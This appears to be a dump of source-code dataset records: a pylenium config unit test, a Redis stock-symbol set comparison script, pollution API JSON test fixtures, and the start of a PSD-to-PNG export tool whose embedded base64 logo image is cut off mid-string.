429a3b81ed60f1fcd5cd0c4d4064e8461124607d
| 1,799
|
py
|
Python
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 169
|
2020-03-16T15:04:42.000Z
|
2022-03-31T18:53:41.000Z
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 163
|
2020-03-15T06:33:54.000Z
|
2022-03-31T21:37:09.000Z
|
tests/unit/test_config.py
|
xtrakTD/pyleniumio
|
3c4b3d86491dd3ccf0bc399a42e5336a3c9f7fa6
|
[
"MIT"
] | 26
|
2020-03-28T05:43:22.000Z
|
2022-02-11T16:46:34.000Z
|
def test_py_config_defaults(py_config):
# driver settings
assert py_config.driver.browser == 'chrome'
assert py_config.driver.remote_url == ''
assert py_config.driver.wait_time == 10
assert py_config.driver.page_load_wait_time == 0
assert py_config.driver.options == []
assert py_config.driver.version == 'latest'
assert py_config.driver.capabilities == {}
assert py_config.driver.experimental_options is None
assert py_config.driver.webdriver_kwargs == {}
# logging settings
assert py_config.logging.screenshots_on is True
assert py_config.logging.pylog_level == 'info'
# viewport settings
assert py_config.viewport.maximize is True
assert py_config.viewport.width == 1440
assert py_config.viewport.height == 900
assert py_config.viewport.orientation == 'portrait'
# custom settings
assert py_config.custom is not None
def test_py_config(py_config):
# driver settings
assert py_config.driver.browser == 'chrome'
assert py_config.driver.remote_url == ''
assert py_config.driver.wait_time == 10
assert py_config.driver.page_load_wait_time == 0
assert py_config.driver.options == []
assert py_config.driver.version == 'latest'
assert py_config.driver.capabilities == {}
assert py_config.driver.experimental_options is None
assert py_config.driver.webdriver_kwargs == {}
# logging settings
assert py_config.logging.screenshots_on is True
assert py_config.logging.pylog_level == 'info'
# viewport settings
assert py_config.viewport.maximize is True
assert py_config.viewport.width == 1440
assert py_config.viewport.height == 900
assert py_config.viewport.orientation == 'portrait'
# custom settings
assert py_config.custom is not None
| 35.27451
| 56
| 0.732073
| 239
| 1,799
| 5.271967
| 0.1841
| 0.228571
| 0.355556
| 0.285714
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0.969841
| 0
| 0.013578
| 0.181212
| 1,799
| 50
| 57
| 35.98
| 0.841819
| 0.07393
| 0
| 0.941176
| 0
| 0
| 0.028968
| 0
| 0
| 0
| 0
| 0
| 0.941176
| 1
| 0.058824
| false
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
35f73226aa4aab7f82708c63714d8ee4fee7b105
| 1,125
|
py
|
Python
|
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | null | null | null |
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | 3
|
2020-12-11T19:12:19.000Z
|
2021-05-21T01:26:57.000Z
|
py/bluemesa/redis/membership.py
|
stormp/bluemesa
|
0295bd234d69c4f9cd78e725924d887bc35af508
|
[
"MIT"
] | 14
|
2020-06-17T15:23:36.000Z
|
2022-01-03T03:04:16.000Z
|
import os
import symboltable
import util
def sdy_sp500():
set1 = util.redis_set_to_python_set("symbol-set-sdy")
set2 = util.redis_set_to_python_set("symbol-set-sp500")
intersection = set1.intersection(set2)
print("\nThese symbols are in the sp500")
print(intersection)
print(len(intersection))
difference = set1.difference(intersection)
print("\nThese symbols are not in the sp500")
print(difference)
print(len(difference))
print("\nThe total number of symbols in both sets")
print(len(set1))
def aristocrats_sdy():
set1 = util.redis_set_to_python_set("symbol-set-aristocrats")
set2 = util.redis_set_to_python_set("symbol-set-sdy")
intersection = set1.intersection(set2)
print("\nThese symbols are in the sdy")
print(intersection)
print(len(intersection))
difference = set1.difference(intersection)
print("\nThese symbols are not in the sdy")
print(difference)
print(len(difference))
print("\nThe total number of symbols in both sets")
print(len(set1))
if __name__ == "__main__":
#sdy_sp500()
aristocrats_sdy()
| 26.162791
| 65
| 0.704889
| 149
| 1,125
| 5.134228
| 0.228188
| 0.062745
| 0.062745
| 0.073203
| 0.833987
| 0.833987
| 0.833987
| 0.833987
| 0.833987
| 0.637909
| 0
| 0.02938
| 0.183111
| 1,125
| 42
| 66
| 26.785714
| 0.803047
| 0.009778
| 0
| 0.516129
| 0
| 0
| 0.260557
| 0.019766
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0
| 0.096774
| 0
| 0.16129
| 0.516129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
c400bbe4af2ce277ad8f4a1c89f363cb886e1bdc
| 2,437
|
py
|
Python
|
tests/unit/pollutionapi30/json_test_dumps.py
|
ChuckVanHoff/pyowm
|
86735d8629ead2cfa0232b0f8ec0b88ab16eff11
|
[
"MIT"
] | 1
|
2019-06-01T07:47:12.000Z
|
2019-06-01T07:47:12.000Z
|
tests/unit/pollutionapi30/json_test_dumps.py
|
cjsgh901/pyowm
|
cdd59eb72f32f7238624ceef9b2e2329a5ebd472
|
[
"MIT"
] | null | null | null |
tests/unit/pollutionapi30/json_test_dumps.py
|
cjsgh901/pyowm
|
cdd59eb72f32f7238624ceef9b2e2329a5ebd472
|
[
"MIT"
] | 1
|
2020-01-20T22:54:02.000Z
|
2020-01-20T22:54:02.000Z
|
"""
JSON test OWM API responses
"""
COINDEX_JSON_DUMP = '{"reference_time": 1234567, "co_samples": [{"pressure": ' \
'1000, "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 681.2920532226562, ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 464.15887451171875, ' \
'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
OZONE_JSON_DUMP = '{"reference_time": 1234567, "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "value": 6.8, ' \
'"reception_time": 1475283600}'
NO2INDEX_JSON_DUMP = '{"reference_time": 1234567, "no2_samples": [{"label": ' \
'"no2", "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"label": "no2_strat", ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"label": "no2_trop", ' \
'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
SO2INDEX_JSON_DUMP = '{"reference_time": 1234567, "so2_samples": [{"pressure": ' \
'1000, "value": 8.168363052618588e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 681.2920532226562, ' \
'"value": 8.686949115599418e-08, "precision": ' \
'-4.999999987376214e-07}, {"pressure": 464.15887451171875, ' \
'"value": 8.871462853221601e-08, "precision": ' \
'-4.999999987376214e-07}], "location": {"country": "UK", ' \
'"name": "test", "coordinates": {"lat": 43.7, "lon": 12.3}, ' \
'"ID": 987}, "interval": "day", "reception_time": 1475283600}'
| 62.487179
| 83
| 0.488716
| 210
| 2,437
| 5.571429
| 0.257143
| 0.046154
| 0.092308
| 0.215385
| 0.903419
| 0.807692
| 0.807692
| 0.794017
| 0.705128
| 0.705128
| 0
| 0.301475
| 0.304473
| 2,437
| 38
| 84
| 64.131579
| 0.388791
| 0.011079
| 0
| 0.709677
| 0
| 0.129032
| 0.679434
| 0.173605
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c485289d8307cb95532f495ede2476bcce5c9243
| 180,686
|
py
|
Python
|
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | 1
|
2017-07-30T22:31:41.000Z
|
2017-07-30T22:31:41.000Z
|
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | null | null | null |
guipsd2png.py
|
MaverickGames/GUIPSD2PNG
|
e050eb84f134229b505231ac9ed107bad580fdf0
|
[
"MIT"
] | null | null | null |
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
Date: Jul 14, 2014
Organization: Maverick Games
Language: python
Dependencies:
- Tkinter
- pillow
- psd_tools
- numpy
- scipy
Usage:
- copy this code into workspace directory
- set options at opt: "file_name", "delay_sec", "ignores"...
- terminal: sudo python manager.py
Contact:
- Minu J: minujeong@maverickgames.co
Author: Minu Jeong
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""
import os, time, threading, json, re, cStringIO, base64
import imagehash
from psd_tools import *
from Tkinter import *
from PIL import Image, ImageTk
# options
opt = {
# woring file name
"file_name":"genetic_stereotypes.psd",
# directory name to create and save layers
"dirname":"gen_layers",
# unity proejct folders
# format:
# keyword : directory
"unity_delevery_keychar": {},
# create preview file (automatically adds to ignores)
"create_preview": True,
"preview_file": "__preview.jpg",
# create coordination json file (automatically adds to ignores)
"create_coord": True,
"coord_file": "__coordination info.json",
# runing delay: seconds
"delay_sec":3,
# ignore files
"ignores":[".DS_Store"],
# application settings
"app_options":{
# application window size
"width":350,
"height":250,
# preview thumbnail size
"preview_image_width":340,
"preview_image_height":160,
},
"logo_image_source": """
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AAAAAAAAAA1jcm9wUmVjdFJpZ2h0bG9uZwAAAAAAAAALY3JvcFJlY3RUb3Bsb25nAAAAAAA4QklNA+0AAAAAABAASAAAAAEAAgBIAAAAAQACOEJJTQQmAAAAAAAOAAAAAAAAAAAAAD+AAAA4QklNBA0AAAAAAAQAAAB4OEJJTQQZAAAAAAAEAAAAHjhCSU0D8wAAAAAACQAAAAAAAAAAAQA4QklNJxAAAAAAAAoAAQAAAAAAAAACOEJJTQP1AAAAAABIAC9mZgABAGxmZgAGAAAAAAABAC9mZgABAKGZmgAGAAAAAAABADIAAAABAFoAAAAGAAAAAAABADUAAAABAC0AAAAGAAAAAAABOEJJTQP4AAAAAABwAAD/////////////////////////////A+gAAAAA/////////////////////////////wPoAAAAAP////////////////////////////8D6AAAAAD/////////////////////////////A+gAADhCSU0EAAAAAAAAAgABOEJJTQQCAAAAAAAEAAAAADhCSU0EMAAAAAAAAgEBOEJJTQQtAAAAAAAGAAEAAAAGOEJJTQQIAAAAAAAQAAAAAQAAAkAAAAJAAAAAADhCSU0EHgAAAAAABAAAAAA4QklNBBoAAAAAAz0AAAAGAAAAAAAAAAAAAACgAAABVAAAAAQAbABvAGcAbwAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAABVAAAAKAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAG51bGwAAAACAAAABmJvdW5kc09iamMAAAABAAAAAAAAUmN0MQAAAAQAAAAAVG9wIGxvbmcAAAAAAAAAAExlZnRsb25nAAAAAAAAAABCdG9tbG9uZwAAAKAAAAAAUmdodGxvbmcAAAFUAAAABnNsaWNlc1ZsTHMAAAABT2JqYwAAAAEAAAAAAAVzbGljZQAAABIAAAAHc2xpY2VJRGxvbmcAAAAAAAAAB2dyb3VwSURsb25nAAAAAAAAAAZvcmlnaW5lbnVtAAAADEVTbGljZU9yaWdpbgAAAA1hdXRvR2VuZXJhdGVkAAAAAFR5cGVlbnVtAAAACkVTbGljZVR5cGUAAAAASW1nIAAAAAZib3VuZHNPYmpjAAAAAQAAAAAAAFJjdDEAAAAEAAAAAFRvcCBsb25nAAAAAAAAAABMZWZ0bG9uZwAAAAAAAAAAQnRvbWxvbmcAAACgAAAAAFJnaHRsb25nAAABVAAAAAN1cmxURVhUAAAAAQAAAAAAAG51bGxURVhUAAAAAQAAAAAAAE1zZ2VURVhUAAAAAQAAAAAABmFsdFRhZ1RFWFQAAAABAAAAAAAOY2VsbFRleHRJc0hUTUxib29sAQAAAAhjZWxsVGV4dFRFWFQAAAABAAAAAAAJaG9yekFsaWduZW51bQAAAA9FU2xpY2VIb3J6QWxpZ24AAAAHZGVmYXVsdAAAAAl2ZXJ0QWxpZ25lbnVtAAAAD0VTbGljZVZlcnRBbGlnbgAAAAdkZWZhdWx0AAAAC2JnQ29sb3JUeXBlZW51bQAAABFFU2xpY2VCR0NvbG9yVHlwZQAAAABOb25lAAAACXRvcE91dHNldGxvbmcAAAAAAAAACmxlZnRPdXRzZXRsb25nAAAAAAAAAAxib3R0b21PdXRzZXRsb25nAAAAAAAAAAtyaWdodE91dHNldGxvbmcAAAAAADhCSU0EKAAAAAAADAAAAAI/8AAAAAAAADhCSU0EFAAAAAAABAAAAAw4QklNBAwAAAAAFFU